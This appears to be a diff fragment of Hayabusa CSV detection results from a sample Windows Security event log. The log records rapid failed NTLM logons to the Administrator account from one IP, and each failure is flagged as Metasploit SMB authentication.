+2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VPtfy3AxXpt9D3bx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRMOrE0Ba983q0Jv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQ0nkyTAeJt3dCpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2fdsRMU9SMm1KpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3kliEPBsbsYNI7yG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gEKFGsRvvlzulxR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M6oUbT8LvS7JNCq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E4dxHwRQVR7iBWa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VRygirU257VfFcR5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6H6i0wkjvWkU6cmp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W4Nh7bYfVvx30hVF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQEsO4GpVjO5xpRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9ZlpSBwq0tLAgzm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65Piip53B1AiSBqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bh7SfuheoykW7Aym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tWdm76C4nL6tkU0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u2WEqTrg3A760Axt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyqhXspTlWwVCwA3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rkidbQJmvQr35Jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zr92VsL1YgHVehnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQP1K9rHrOyL0TOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LR783q3o34oLQLTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6NCTNhcghRGWf1qi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CVJdStLdKDbUICyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luAoVhEj1rOgZBfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OrqmovxoEEjLCaYV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AIP4mDSVhM27IAIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cym5lXDK01XuJz2b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7pYXA1Ic6BOfG31o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b722QrTSVoZGfiK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NzRFz4L7dpar794B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pLWuw9eMN9rqm0Ic  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sE7pzfiKRfOb2dH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxL1cV8OiFVRfj4I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHs8Z8XPLg58jZ1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6kRLlJt3Oxwhdgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s4kTwriHAKVsTqzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jfitpZ5ZrzBfpNf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdcU6ypEEeIAugGI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jIMfGIU1pHasO88g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHsxKEQK7CWSqprp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QkC70klP6mv8YZrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3YM3zaZk64qqq7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mOLbk23zOqQLZYZU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0tlyXqvCQJVqaB5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: npjQlHcGls5gENng  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
